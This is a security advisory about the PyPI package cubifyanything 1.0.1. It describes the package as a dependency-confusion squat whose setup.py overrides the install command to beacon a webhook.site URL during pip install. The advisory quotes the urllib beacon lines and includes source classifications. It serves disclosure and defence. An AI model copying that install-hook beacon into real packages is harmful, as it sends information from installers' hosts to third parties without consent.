Vulnerability
Malicious code in cubifyanything (PyPI)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (2cab88d6047b15dbb32ca245f083a7eecd1df75ce183d47637c6c9edf5cfd0b4) cubifyanything 1.0.1 is a dependency-confusion squat shipping no real functionality (top-level cubifyanything/__init__.py is 0 bytes) and a setup.py that installs a custom install command class which performs an HTTP GET to a webhook.site URL at install time, reporting that the package was installed on the target host. setup.py lines 7-10 contain `webhook_url = "https://webhook.site/SƏNİN_WEBHOOK_LİNKİN"` followed by `urllib.request.urlopen(f"{webhook_url}?status=cubifyanything_installed", timeout=5)`, fired automatically from a cmdclass override during `pip install`. The package self-describes as 'Dependency Confusion PoC' with author 'Security Researcher'. Although the placeholder token in the URL (Azerbaijani for 'YOUR_WEBHOOK_LINK') means the specific URL likely fails DNS resolution in this copy, the package's design — claim a name expected to resolve to an internal/private package, ship empty code, and beacon to an attacker-controlled webhook host on install — is the canonical dependency-confusion attack shape and produces install-time outbound traffic from the installer's machine to a third-party endpoint. ## Source: kam193 (c13a0f89f1b7b7185b34200461191cf8c108ac50a05dc8e66151d547a2e4d971) Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities. Campaign: GENERIC-standard-pypi-install-pentest Reasons (based on the campaign): - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk. - The package overrides the install command in setup.py to execute malicious code during installation.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence